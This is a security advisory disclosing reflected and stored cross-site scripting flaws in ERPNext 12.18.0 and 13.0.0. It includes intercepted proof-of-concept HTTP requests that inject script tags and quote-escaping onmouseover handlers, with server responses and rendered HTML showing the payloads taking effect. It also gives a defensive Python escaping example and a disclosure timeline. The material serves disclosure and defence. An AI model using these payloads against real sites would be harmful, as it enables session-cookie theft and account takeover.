ERPNext 12.18.0 / 13.0.0 Cross Site Scripting
Posted May 11, 2021
Authored by Stefan Pietsch, Nick Decker | Site trovent.io

ERPNext versions 12.18.0 and 13.0.0 suffer from reflective and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 699a6d07a77fc3e81b2deafe5caea2a355ca696143d694138925ef128a29180b

# Trovent Security Advisory 2103-02 #
#####################################


Multiple XSS vulnerabilities in ERPNext 13.0.0/12.18.0
######################################################


Overview
########

Advisory ID: TRSA-2103-02
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2103-02
Affected product: ERPNext
Tested versions: 12.18.0 and 13.0.0 beta
Vendor: Frappé Technologies https://frappe.io
Credits: Trovent Security GmbH, Nick Decker, Stefan Pietsch


Detailed description
####################

Trovent Security GmbH discovered multiple Cross-Site Scripting vulnerabilities
in the current software versions of ERPNext (13.0.0 and 12.18.0).
An attacker could leverage these vulnerabilities to steal session cookies,
install a JavaScript keylogger and more.


1. Reflected XSS in _server_messages exception field
####################################################

When an API call causes an error, the server sometimes sends back exception messages
containing unsanitized user input.
This creates the possibility of reflected XSS in any API call/server function using "_server_messages".
This would be hard to exploit because we only found _server_messages exceptions
in API calls made by the application itself, not by the user.

Severity: High
CVSS Score: 7.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:L)
CWE ID: 79
CVE ID: TBD

Proof of concept
################

Sample request intercepted with Burp to inject JavaScript. Note that the JavaScript
is injected in "reference_name" to raise an exception:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


POST /api/method/frappe.desk.form.utils.add_comment HTTP/1.1
Host: sqlprodtest.local:1080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: e6532d5e7bef6360c9646d58e0940e8004820db8704ab3dad1d2d875
X-Frappe-CMD:
X-Requested-With: XMLHttpRequest
Content-Length: 157
Origin: http://sqlprodtest.local:1080
Connection: close
Referer: http://sqlprodtest.local:1080/desk
Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; system_user=yes; full_name=Administrator; user_id=Administrator; user_image=; io=Ly9MpKRfK_nrKpurAAAN

reference_doctype=User&reference_name=%3cscript%3ealert(1)%3c%2fscript%3e&content=xsstest&comment_email=Administrator


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



RESPONSE (removed the Stack Trace for better readability):

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


HTTP/1.1 417 EXPECTATION FAILED
Server: nginx/1.19.7
Date: Thu, 11 Mar 2021 14:23:05 GMT
Content-Type: application/json
Content-Length: 1894
Connection: close
Set-Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; Expires=Sun, 14-Mar-2021 14:23:05 GMT; Path=/
Set-Cookie: system_user=yes; Path=/
Set-Cookie: full_name=Administrator; Path=/
Set-Cookie: user_id=Administrator; Path=/
Set-Cookie: user_image=; Path=/

{"exc_type":"LinkValidationError","exc":"[\"Traceback (...)]","_server_messages":"[\"{\\\"message\\\": \\\"Could not find Reference Name: <script>alert(1)</script>\\\", \\\"indicator\\\": \\\"red\\\", \\\"raise_exception\\\": 1}\"]"}


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



2. Stored XSS everywhere where user input is stored inside of HTML tags
#######################################################################

The application does not sanitize escaped quotation marks (\").
This can be abused to escape the HTML attribute the input is stored in,
which allows the user to add new attributes such as event handlers,
leading to stored XSS.
Our testing concluded that this issue is present in the entire application;
the only requirement is that the input is reflected
inside of an HTML tag, not between tags. It also can't be a linking
attribute like "href", because inside those, user input is escaped.
For example, in combination with HTML injection through a comment,
a malicious user is able to modify his profile to steal cookies
from every user, including administrators, who views his profile.

Severity: High
CVSS Score: 8.2 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L)
CWE ID: 79
CVE ID: TBD

Proof of concept
################

Sample request where the file name contains the XSS code with the escaped quotation marks:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


POST /api/method/upload_file HTTP/1.1
Host: sqlprodtest.local:1080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Frappe-CSRF-Token: e6532d5e7bef6360c9646d58e0940e8004820db8704ab3dad1d2d875
Content-Type: multipart/form-data; boundary=---------------------------173872902410009950314171894076
Content-Length: 74566
Origin: http://sqlprodtest.local:1080
Connection: close
Referer: http://sqlprodtest.local:1080/desk
Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; system_user=yes; full_name=Administrator; user_id=Administrator; user_image=; io=o0Bglip9YmrzxZj9AAAX

------------------------------173872902410009950314171894076
Content-Disposition: form-data; name="file"; filename="user-enum.png\" onmouseover=\"alert(1234)\""
Content-Type: image/png

PNG
(...)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



HTML code snippet from erpnext-server.com/desk#List/File/Home.
The user is able to escape the context of the title attribute and
add an onmouseover event handler, which triggers the JavaScript:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<div class="level list-row small">
<div class="level-left ellipsis">

<div class="list-row-col ellipsis list-subject level">
<input class="level-item list-row-checkbox hidden-xs" type="checkbox" data-name="a5ff65f666">
<span class="level-item ellipsis" title="user-enum.png" onmouseover="alert(1234)" "="">
<a class="ellipsis" href="#Form/File/a5ff65f666" title="user-enum.png" onmouseover="alert(1234)" "="">

<i class="octicon octicon-file-text text-muted" style="width: 16px;"></i>
<span>user-enum.png" onmouseover="alert(1234)"</span>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

To mitigate this vulnerability, we recommend always escaping quotation marks.
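The following Python example is added here to illustrate the recommendation; it is not ERPNext's code. It takes the stored file name as it appears in the rendered list snippet above, drops it into a title attribute once unescaped (the vulnerable pattern) and once with quotation marks escaped, and then parses both with the standard library HTML parser to check which attributes a browser would actually see.

```python
import html
from html.parser import HTMLParser

# The file name as stored after the advisory's upload request (taken from the
# rendered <span> text in the advisory); the \" sequences have become plain quotes.
STORED_NAME = 'user-enum.png" onmouseover="alert(1234)"'


def render_title_unsafe(name: str) -> str:
    """Vulnerable pattern: the value is interpolated into the attribute unchanged,
    so a quote in the value closes the attribute and whatever follows becomes
    new attributes."""
    return f'<span class="level-item ellipsis" title="{name}">{name}</span>'


def render_title_safe(name: str) -> str:
    """Hardened pattern: html.escape(quote=True) turns " into &quot; (and < > & into
    entities), so the value can never terminate the attribute it sits in."""
    esc = html.escape(name, quote=True)
    return f'<span class="level-item ellipsis" title="{esc}">{esc}</span>'


class _AttrCollector(HTMLParser):
    """Collects every attribute name the parser sees on any start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(k for k, _ in attrs)


def event_handler_attrs(markup: str) -> list[str]:
    """Return the on* attribute names present in markup; an empty list means the
    rendered HTML carries no injected event handler."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return sorted(a for a in p.names if a.startswith("on"))


if __name__ == "__main__":
    print(event_handler_attrs(render_title_unsafe(STORED_NAME)))  # ['onmouseover']
    print(event_handler_attrs(render_title_safe(STORED_NAME)))    # []
```

The same check is useful as a regression test around any template that places user-controlled text inside an attribute: the list of on* attributes after rendering untrusted input must stay empty.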


History
#######

2021-03-08: Vulnerability found
2021-03-12: Advisory created and vendor contacted
2021-03-22: Vendor replied that they request CVE IDs after a fix is released
2021-04-19: Vendor informed about planned disclosure date (2021-05-11)
2021-05-03: Vendor contacted, asking for status
2021-05-07: No reply from vendor, vendor contacted again
2021-05-11: Advisory published